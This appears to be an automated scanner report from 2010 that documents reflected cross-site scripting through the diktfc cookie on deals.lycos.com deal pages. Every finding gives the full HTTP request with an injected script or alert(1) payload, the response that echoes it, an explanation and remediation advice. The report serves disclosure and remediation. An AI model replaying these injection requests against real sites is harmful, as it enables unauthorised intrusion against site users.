GET /deal/logmein-ignition-for-iphone-for-20-413418 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6f691"%3balert(1)//38cfa6531c3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:12 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:12 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18152
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa8ec"><script>alert(1)</script>6cc672e8440 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/mirror-s-edge-for-iphone-for-1-414300 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaa8ec"><script>alert(1)</script>6cc672e8440; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:45 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:45 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17872
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/mirror-s-edge-for-iphone-for-1-414300&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaa8ec"><script>alert(1)</script>6cc672e8440&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d87f"%3balert(1)//0adce29b43c was submitted in the diktfc cookie. This input was echoed as 4d87f";alert(1)//0adce29b43c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/mirror-s-edge-for-iphone-for-1-414300 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4d87f"%3balert(1)//0adce29b43c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:47 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:47 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17841
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56d85"%3balert(1)//7f46c76a176 was submitted in the diktfc cookie. This input was echoed as 56d85";alert(1)//7f46c76a176 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A56d85"%3balert(1)//7f46c76a176; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:02 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:03 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17716
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7362"><script>alert(1)</script>5134e7589ce was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af7362"><script>alert(1)</script>5134e7589ce; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:01 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:01 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17692
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... //b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/mogo-talk-bluetooth-headset-for-iphone-20-413971&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af7362"><script>alert(1)</script>5134e7589ce&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58697"><script>alert(1)</script>383e526ee99 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A58697"><script>alert(1)</script>383e526ee99; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:17 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:17 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18478
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A58697"><script>alert(1)</script>383e526ee99&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22e54"%3balert(1)//ca2c7b2c015 was submitted in the diktfc cookie. This input was echoed as 22e54";alert(1)//ca2c7b2c015 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A22e54"%3balert(1)//ca2c7b2c015; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:18 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:19 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18514
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f0b2"><script>alert(1)</script>781860d6eaf was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7f0b2"><script>alert(1)</script>781860d6eaf; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:11 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:11 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17816
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7f0b2"><script>alert(1)</script>781860d6eaf&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c764"%3balert(1)//b75df22a01a was submitted in the diktfc cookie. This input was echoed as 2c764";alert(1)//b75df22a01a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2c764"%3balert(1)//b75df22a01a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:12 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:13 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17801
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8c0"><script>alert(1)</script>d9b09df56e0 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/nokia-2720-prepaid-cell-phone-for-6-413497 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c8c0"><script>alert(1)</script>d9b09df56e0; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:06 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:07 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... "http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/nokia-2720-prepaid-cell-phone-for-6-413497&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c8c0"><script>alert(1)</script>d9b09df56e0&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3b10"%3balert(1)//c0968ffef2c was submitted in the diktfc cookie. This input was echoed as b3b10";alert(1)//c0968ffef2c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/nokia-2720-prepaid-cell-phone-for-6-413497 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab3b10"%3balert(1)//c0968ffef2c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:08 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:08 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18008
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db343"%3balert(1)//3b16844b478 was submitted in the diktfc cookie. This input was echoed as db343";alert(1)//3b16844b478 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adb343"%3balert(1)//3b16844b478; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:43 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15400
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4403f"><script>alert(1)</script>7f5d7171fd2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4403f"><script>alert(1)</script>7f5d7171fd2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:42 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:42 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15417
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/panasonic-58-1080p-plasma-hdtv-1-100-414276&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4403f"><script>alert(1)</script>7f5d7171fd2&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4eee"%3balert(1)//c42f28c6d4b was submitted in the diktfc cookie. This input was echoed as f4eee";alert(1)//c42f28c6d4b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af4eee"%3balert(1)//c42f28c6d4b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:37 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16317
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50667"><script>alert(1)</script>3e46c174419 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
